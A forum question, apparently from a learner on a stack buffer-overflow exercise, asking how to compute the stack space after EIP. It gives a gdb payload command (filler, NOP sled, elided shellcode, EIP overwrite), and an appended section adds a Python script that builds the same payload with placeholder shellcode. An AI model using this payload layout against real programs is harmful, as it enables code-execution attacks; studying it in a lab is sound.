Hello everyone, I am finding a bit of confusion in resolving that question.
I reckon I must return the size between the EIP address and the last address of the stack (0xffffffff).
I think I understand the basics of the stack; if someone could please point out whether I am wrong or where my assumptions are failing, here is what I did:
1- I generate the shellcode following the tutorial.
2- I execute the Python instruction in order to adjust the exploit size.
My command is: run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xda\xca\xba\xe4…[…]…\xad\xec\xa0\x04\x5a\x22\xa2" + "\x66" * 4')
3- Then I examine the stack, with its registers and its addresses, and I try to take the EIP address of the bowfunc (the current frame) minus the last address of the stack (0xffffffff).
4- There are 2 stack frames (you can see this with the gdb "bt" command). I have tried the subtraction with both EIP registers and the last address of the stack (0xffffffff), but had no luck.
Am I calculating the space in the wrong way? Is this way of getting the size of the stack space after the EIP okay?
Thanks a lot in advance,
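The payload layout from the post (filler, NOP sled, shellcode, four-byte EIP overwrite, 1040 bytes in total) and the distance-to-0xffffffff arithmetic, as an added Python 3 example that is not part of the original post or the tutorial it refers to. The shellcode is elided in the post, so a constructed placeholder of the same length (95 bytes of int3) stands in for it, and the saved-EIP slot address 0xbffff4cc is an assumed value of the kind gdb would show, not one taken from the post.

```python
# Added example (not from the original post): build the overflow payload
# from its components, check that the layout adds up to the intended total,
# and compute the two numbers the post is juggling: the offset at which the
# EIP overwrite lands inside the payload, and how many bytes lie between a
# stack address and the last address of a 32-bit address space.

TOTAL_LEN = 1040          # total payload length used in the post
NOP_SLED_LEN = 124        # "\x90" * 124 in the post
EIP_LEN = 4               # "\x66" * 4 overwrites the saved return address
STACK_END = 0xFFFFFFFF    # last address of a 32-bit address space

# Constructed stand-in: the post elides the real shellcode bytes, so this
# placeholder only matches its length (95 bytes). int3 (0xcc) traps if hit.
PLACEHOLDER_SHELLCODE = b"\xcc" * 95


def build_payload(shellcode, total_len=TOTAL_LEN, nop_len=NOP_SLED_LEN,
                  ret_bytes=b"\x66" * EIP_LEN, filler=b"\x55"):
    """Return (payload, ret_offset).

    Layout mirrors the post: filler | NOP sled | shellcode | saved-EIP overwrite.
    ret_offset is the byte offset of the EIP overwrite inside the payload,
    i.e. how far past the start of the overflowed buffer the saved return
    address has to sit for the overwrite to land on it.
    """
    if len(ret_bytes) != EIP_LEN:
        raise ValueError("32-bit return address must be exactly 4 bytes")
    pad_len = total_len - nop_len - len(shellcode) - len(ret_bytes)
    if pad_len < 0:
        raise ValueError("NOP sled + shellcode + EIP do not fit in %d bytes" % total_len)
    payload = filler * pad_len + b"\x90" * nop_len + shellcode + ret_bytes
    assert len(payload) == total_len
    return payload, total_len - len(ret_bytes)


def bytes_to_stack_end(addr, stack_end=STACK_END):
    """Bytes from addr up to and including the last address (0xffffffff)."""
    if not 0 <= addr <= stack_end:
        raise ValueError("address outside the 32-bit address space")
    return stack_end - addr + 1


def main():
    payload, ret_off = build_payload(PLACEHOLDER_SHELLCODE)
    print("payload length: %d, EIP overwrite at offset %d (0x%x)"
          % (len(payload), ret_off, ret_off))
    # Assumed address of the saved-EIP slot, as gdb might show it; not from the post.
    saved_eip_slot = 0xBFFFF4CC
    print("bytes from 0x%08x to 0x%08x inclusive: %d"
          % (saved_eip_slot, STACK_END, bytes_to_stack_end(saved_eip_slot)))


if __name__ == "__main__":
    main()
```

build_payload refuses a layout that does not fit the requested total, so shrinking the filler count below zero (for example by lengthening the shellcode) is reported instead of silently producing a payload of the wrong size. Note that the post's one-liner is Python 2 syntax (print as a statement, str as bytes); the example above uses explicit bytes objects so it runs under Python 3.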